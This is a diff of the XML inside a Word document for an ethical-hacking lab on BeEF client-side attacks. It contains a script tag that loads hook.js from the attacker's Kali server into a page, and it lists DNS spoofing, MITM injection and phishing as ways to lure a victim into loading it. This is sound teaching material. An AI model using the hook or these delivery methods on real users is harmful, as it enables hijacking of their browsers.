--- a/Ethical_Hacking/BeEF_Client_Side_Attack.docx
+++ b/Ethical_Hacking/BeEF_Client_Side_Attack.docx
@@ -1,12 +1,12 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc96778907"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc191729604"/>
       <w:r>
         <w:t>BeEF Client Side Attack</w:t>
       </w:r>
@@ -50,8 +50,9 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -63,7 +64,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc96778907" w:history="1">
+          <w:hyperlink w:anchor="_Toc191729604" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -90,7 +91,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc96778907 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc191729604 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -130,11 +131,12 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc96778908" w:history="1">
+          <w:hyperlink w:anchor="_Toc191729605" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -161,7 +163,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc96778908 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc191729605 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -201,11 +203,12 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc96778909" w:history="1">
+          <w:hyperlink w:anchor="_Toc191729606" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -232,7 +235,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc96778909 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc191729606 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -272,11 +275,12 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc96778910" w:history="1">
+          <w:hyperlink w:anchor="_Toc191729607" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -303,7 +307,79 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc96778910 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc191729607 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc191729608" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Attack the Target</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc191729608 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -343,11 +419,12 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc96778911" w:history="1">
+          <w:hyperlink w:anchor="_Toc191729609" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -374,7 +451,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc96778911 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc191729609 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -394,7 +471,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -456,12 +533,37 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kali </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Linux and Windows should be on the same NAT network</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that we’ve been using.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc96778908"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc191729605"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -511,6 +613,14 @@
               <w:pStyle w:val="Code"/>
             </w:pPr>
             <w:r>
+              <w:t>sudo apt dist-upgrade -y</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
               <w:t>sudo apt install beef-xss</w:t>
             </w:r>
           </w:p>
@@ -555,7 +665,14 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>beef start</w:t>
+        <w:t xml:space="preserve">beef </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>xss</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -567,7 +684,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Type in a different password for the beef user: Password02</w:t>
+        <w:t>Enter your credentials</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for sudo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -579,6 +699,18 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:t>Type in a different password for the beef user: Password02</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
         <w:t>When the web browser interface shows up.</w:t>
       </w:r>
     </w:p>
@@ -610,7 +742,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc96778909"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc191729606"/>
       <w:r>
         <w:t xml:space="preserve">Setup </w:t>
       </w:r>
@@ -621,16 +753,158 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">If you go back to the terminal session you used to launch beef, scroll up to find this piece of </w:t>
-      </w:r>
-      <w:r>
-        <w:t>JavaScript</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> This script will hook the target web browser to the BeEF framework.</w:t>
+        <w:t xml:space="preserve">There are many ways to get the user to run </w:t>
+      </w:r>
+      <w:r>
+        <w:t>malicious</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> code. DNS spoof requests, MITM injection, spoofed email, or social engineer the target to open the hook page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">We are going to change the local web site on Kali to include a malicious script that will hook the web browser of our </w:t>
+      </w:r>
+      <w:r>
+        <w:t>victim</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> computer to our Beef program.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the Terminal: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">cd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/var/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>www/html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This is the folder where the files for </w:t>
+      </w:r>
+      <w:r>
+        <w:t>apache2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> web server </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">on your local Kali Linux </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">is stored. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>index.html</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is the default page that is loaded when someone browses to the web site.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Type:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">udo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>geany</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> index.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Delete all the text in the page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Insert the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">following </w:t>
+      </w:r>
+      <w:r>
+        <w:t>script.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -672,11 +946,6 @@
       </w:tr>
     </w:tbl>
     <w:p>
-      <w:r>
-        <w:t>There are many ways to get the user to run this code. DNS spoof requests, MITM injection, spoofed email, or social engineer the target to open the hook page.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
@@ -685,37 +954,19 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the Terminal: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">cd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/var/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>www/html</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>This is the folder where the files for your web server is stored. index.html is the default page that is loaded when someone browses to the web site.</w:t>
+        <w:t xml:space="preserve">Change the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">127.0.0.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">IP address to the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">local </w:t>
+      </w:r>
+      <w:r>
+        <w:t>IP address of your Kali machine.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -727,35 +978,17 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Type:</w:t>
-      </w:r>
-      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">udo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>geany</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> index.html</w:t>
+        <w:t>CTRL S</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to save</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the file.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -767,7 +1000,33 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Delete all the text in the page.</w:t>
+        <w:t xml:space="preserve">At a terminal prompt, start the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>pache web se</w:t>
+      </w:r>
+      <w:r>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ver: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>service apache2 start</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -779,136 +1038,17 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Insert the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">following </w:t>
-      </w:r>
-      <w:r>
-        <w:t>script.</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9350"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Code"/>
-            </w:pPr>
-            <w:r>
-              <w:t>&lt;script src=</w:t>
-            </w:r>
-            <w:r>
-              <w:t>"</w:t>
-            </w:r>
-            <w:r>
-              <w:t>http://127.0.0.1:3000/hook.js</w:t>
-            </w:r>
-            <w:r>
-              <w:t>"</w:t>
-            </w:r>
-            <w:r>
-              <w:t>&gt;&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Change the IP address to the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">local </w:t>
-      </w:r>
-      <w:r>
-        <w:t>IP address of your Kali machine.</w:t>
+        <w:t>The terminal prompt should</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> reappear quickly. Unless there is an error, you are good to go.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>CTRL S</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to save</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the file.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">At a terminal prompt, start the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pache web se</w:t>
-      </w:r>
-      <w:r>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ver: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>service apache2 start</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc96778910"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc191729607"/>
       <w:r>
         <w:t>Hook the Target</w:t>
       </w:r>
@@ -957,7 +1097,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> (Substitute your local Kali IP for 127.0.0.1)</w:t>
+        <w:t xml:space="preserve"> (Substitute your Kali IP for 127.0.0.1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1003,7 +1143,7 @@
         <w:t>BeEF</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> in your Kali machine: You should see your Windows 10 target machine IP address under </w:t>
+        <w:t xml:space="preserve"> in your Kali machine: You should see your Windows target machine IP address under </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1025,6 +1165,18 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:t>Click on the target machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Go to the </w:t>
       </w:r>
       <w:r>
@@ -1095,9 +1247,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc191729608"/>
       <w:r>
         <w:t>Attack the Target</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1162,22 +1316,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Hooked Domain</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>Create Alert Dialog</w:t>
       </w:r>
     </w:p>
@@ -1190,6 +1328,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Type in a message in the Alert Text </w:t>
       </w:r>
       <w:r>
@@ -1295,7 +1434,33 @@
         <w:sym w:font="Wingdings" w:char="F0E0"/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Create Prompt Dialog </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Browser</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Create Prompt Dialog</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
